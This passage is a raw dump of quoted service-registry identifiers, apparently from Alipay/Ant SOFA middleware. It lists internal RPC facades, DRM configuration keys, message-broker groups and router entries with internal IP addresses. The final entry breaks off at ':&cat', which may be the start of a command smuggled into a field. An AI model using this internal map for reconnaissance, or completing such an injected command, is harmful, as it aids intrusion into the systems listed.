#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchasset.core.service.kbbase.AssetProduceAssignService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:pcreditauthprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.25.40#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.fc.gotone.common.service.MessageSendService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.antinvoice.common.service.facade.api.EinvTitleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:custdecision@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.24.64#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.yqdataservice.common.service.facade.report.PoCustomizedPageTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.jdbc.ops.datasource.insmobile.mobileDataSource.operation,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.imif.opcenter.common.service.facade.api.MerchantContractFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imif.common.service.facade.v2.LeadsCommonService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudprovision:name=com.alipay.common.tracer.manage.TracerDrm.zdalTairDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.pointmng:name=com.alipay.pointmng.common.service.integration.drm.ScardOpenAccountResource.accountUpgradeList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.framodel.core.service.facade.api.FramodelFeatureFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.70.93#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pcactivitycore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloudinc.common.service.facade.AntvipDomainQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sdaxconnectplatform.common.service.facade.device.XpDeviceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fpdecision.platform.common.service.facade.iface.RiskAxelTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.client.service.shop.ShopStaffRelationQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.core.test.hag.HagTestGzoneService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:fininsightbff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.191.219#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.testresaopone.facade.TestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:quotprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.138.57#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finfocore:name=com.alipay.dwebupload.client.drm.DomainConfig.aftsDwVIP,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilepromo.common.service.facade.ad.PromoAdViewMangerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acmeteragecore.common.service.facade.back.PrimaryDataCheckRuleConfService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.clearingcenter:name=com.alipay.clearingcenter.core.config.drm.LiquidateInstructionSwtichDRM.targetCodes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.findtprod:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","ropservice@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.167.218.203#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mservicesinspect.biz.shared.inspect.service.DetectDispatcherProcessService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.promokernel.common.manage.facade.api.PrizeManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finfundtrade.common.service.facade.api.FundGotoneTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundmng.biz.clearing.management.service.AlarmService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.224.100#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.csaccurate.service.facade.mng.api.FactorQueryService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","sdaxconnectplatform@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.platform.schedule.concurrent.split.Splitor:1.0:approvePdcAgreementProcessSyncTask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_HOOK4VULNS#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.securitydatalib.common.facade.service.SecurityDataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fincommontaskhub.service.facade.service.spi.DataLoadService:1.0:finopencore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.common.tracer.manage.TracerDrm.zdalOtsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.filebridge.service.batch.facade.api.BatchScanService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mrchstm@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csplatform.service.facade.api.TelPhoneInfoService:1.0:outer@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinwormhole.common.service.facade.api.InternalSessionManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.cicada.common.service.facade.api.AppFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.autoinsprod.common.service.facade.AutoInsTradeReduceFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.channelrouter.service.facade.InstAttrQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.mng.feature.facade.DataReleaseService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.spi.RpcSpi:1.0:openapi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_${app_domain}#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.airmng.common.service.facade.monitor.AirMonitorParamService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.zskynet.integration.drm.AlarmCheckDRM.guardianRollBackAll,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.certifymng:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.maxBurstSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.customscenter:name=com.alipay.customscenter.biz.declare.drm.CommonConfig.useNewPayerCertValidationPids,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrp.service.facade.RecommendService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_DMS_SHARED#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbservindustryprod.common.service.facade.trendplay.TrendPlayQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.cfin.cfloancore.service.facade.api.query.OutBizNoMappingInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_FINQUOTATIONCENTER#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.190.56#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.antcloud.dds.zdal.interfaces.endpoint.facade.rest.AppDsRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbfeaturecenter.common.service.facade.FeatureServicePlatformConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.linka:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.vmEmergencyEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mdeduct.common.service.facade.agreement.AuthorizationVerifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ipayment.service.facade.api.InstantPaymentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acccenter.common.service.facade.inner.ProductIntentionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.fininfo.pcconfigwrite.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.securitydata:name=com.alipay.securitydata.common.service.indicator.drm.IndicatorSnapshotResource.supplementSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mfinquotationprod.common.service.facade.api.SymbolQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.core.service.exceptionana.ClientAlarmNotifyInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:bizfundprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.masterdata.common.service.client.mcc.MccQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:kbadvert@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.huntshadow.HsEventService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpipe.zqueue:qaZQueue49:onelevel#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchstm.common.service.facade.mart.facade.AssetSpuFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imdopunit.facade.api.imdb.ImdbDiagnosticsService:1.0:imdb_cn@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.infosec.core.basic.RegexCheckManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.service.facade.LeadsCategoryFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qualitymeasure.service.facade.api.ProjectExtendService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","supergw@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.zdataquery.common.service.facade.hbase.FinComposeDepositbackHbaseQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.filecore.service.facade.spi.FileMoveCallBack:1.0:finbatch@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkkycplatform.common.service.facade.evaqus.EvaluationQusFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityservice.facade.guardian.service.GuardianAbnormalMessageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kmi.common.service.facade.KeyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.speech.api.speech.SpeechFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.190.101#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.uif.facade.user.UifUserService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.acsellcore.common.service.facade.quotation.QuotationQueryFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Sub_Servers_TP_S_FPLIQUIDATE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.scheduler.common.service.facade.query.SchedulerQueryFacade:1.0:scheduler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openauth.common.service.facade.authtoken.AppToAppCancleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.common.service.facade.trade.FintradeOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.bizprodmng.biz.shared.drm.impl.TransportCertDrmConfigImpl.certOverTimeFlag,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finvirtualta.core.service.yeb.manager.UserBalanceManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.content.ReprintContentInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.archimedes.common.service.facade.api.ValidationStrategyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.core.service.AccountPreBalanceTaskService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cap.common.service.CapUserService:1.0:internal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.243.179#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.routeclient.interfacename:diopen#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.fcbuservice.common.service.facade.RoleActionFacade:1.0:zmbuservice-roleactioncompatiblefacade-managerole-antyixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.biz.claim.creditorsright.service.CreditorsRightTransferService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finbaservice.common.service.facade.operatelog.api.OperateLogFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.datapoint.LocalDataPointValidateService:1.0:zmodelcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.237.83#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.nodejs.ConsumerService:1.0:kaleidoscopetwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetinsight.common.service.facade.api.ManagerEvaluationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappcommon.common.service.facade.baas.SxmMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcapplycore.common.service.facade.profile.UserProfileManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imemberprod.service.facade.api.paymentmethod.PaymentMethodService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.xspace.shop.XSpaceShopQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataservice.common.service.facade.UniDataQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.permlimit:name=com.alipay.permlimit.nearshare.drm.CommonSwitchConfig.allowedOnArgErr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acprovisioncore.common.facade.resource.facade.ots.OTSFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openexprod.common.service.facade.rcache.RCacheNotifyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iexchange.service.inner.ForeignExchangeInteractiveTaskService:1.0:foreignExchangeInteractiveTaskService@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.market.SocialServiceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:opensupport_onstopmng_industryService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloudinc.common.service.facade.VipDomainOpsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordercore.product.common.service.api.view.PdServiceOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","finopencore@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.alipassprod.service.facade.api.AlipassProfileManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.arcore.common.service.batch.facade.BatchOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.drmdemos:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.cityVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.routeclient.interfacename:insbffweb#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:certify@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.common.spi.service.MobileCodecRouteService:1.0:mobilepep@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.biz.service.impl.schedule.InsCommercialTouchTaskDRM.taskDemotionDelay,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secretcore.endpoint.facade.ClientRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.autoinsprod.common.service.facade.AgentCompanyConfigFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zprodqueryTairCacheCZone.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secucommunity.common.service.facade.live.api.LiveContentAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.asyncGetVipDomainsIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcloanoperation.facade.crowd.CrowdManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.atd:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.disableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.acctrans.facade.api.acctrans.AcctransAccoreSupportFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.airmng.common.service.facade.principal.PrincipalAccountRelationService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.common.service.facade.redeem.AssetRedeemCalcFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.project.adapter.ide.service.TenantConfigService:1.0:dpproject@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.workflowxTBaseCache.watchMember,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antsycm.common.service.facade.datamock.DataMockFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.CertifyLimitService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundprod.common.service.facade.prodmng.api.TaskProcessCallBackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-PCLOANAPPLY-SERVICE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbservcore.common.service.facade.OperatorPidQueryFacadeV2:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iaccenter.facade.query.api.TitleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.common.service.facade.appointment.AppointmentProductTypeQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.middlewareSwitch:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableHeadCarry,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.afsc.common.service.tianxun.service.TxApkTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mitemcenter.common.service.facade.backend.api.BackendManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY@adexchange#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.gfas:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.checkMvelBlackKeyWords,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antmember.common.service.facade.growthplus.topping.ToppingRuleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservcore.common.service.facade.spi.config.KbProxyEnvGroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:antmember@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.AssetRiskQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finauth.common.service.facade.file.service.FileTaskManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.drm.DrmSourceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkmerchantprod.common.service.facade.RateVersionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","omocore@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.amldata.com.service.facade.api.AmlDataViewService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.147.178#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fccfpcenter_ecmProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insautobff:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.closeOldPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.118.55#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finadvisorprod.common.service.facade.api.AssetInventoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.asset.AssetPrepareService:1.0:commoncard@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:bizfundprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ipsponsorprod.biz.shared.service.BudgetCoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mergepayprod.common.service.facade.mergeorder.api.MergeOrderFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.10.3#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.dms.common.service.PAISingleNodeConstructService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.antmember.common.service.facade.UserGradeQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.kbsearch.common.service.facade.api.buffett.BuffettImageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_EBILLCENTER#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ucrcenter.service.facade.ZmCreditUserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ialicore:name=com.ipay.ialicore.common.drm.RegionStatusSwitch.regionSupportTenantForLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.nodejs.ConsumerService:1.0:pcmloanbff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.testcenter.openapi.facade.ToolOpenApiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.server.amountPrepareBizQueue#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.superapi.client.SystemAppInvokeService:1.0:finfocore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.echox.drm.EchoRecordConfigDrm.recordConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilebc.common.service.facade.systemParam.SystemParamFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:cloudlego@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.checkroute.CheckRouteService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antlink.tuling.common.service.api.idm.IdMappingQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imatchfacade.common.service.facade.statistics.StatisticsApiService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.isvinfo.IsvInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.83.175#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_10.15.241.14#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.lendpofprod:name=com.alipay.zcache.tbase.zdatabusTairCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchstm.common.service.facade.mart.facade.AmMessageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custdecision.service.facade.XflushConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.ProductUseService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.iotcubeGzoneTairCache.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilelbs.common.service.facade.FindUserService:1.0:mobilelbs_find_user_service@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.isecuritycore.service.analyze.facade.MerchantProductService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iclientgw.adapterservice.MobileAdapterService:1.0:securitysimulate@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditbatch.service.BankInstQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.BPInstanceFacade:1.0:fcprocess@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_INSSCENE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.45.68.144#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:&cat 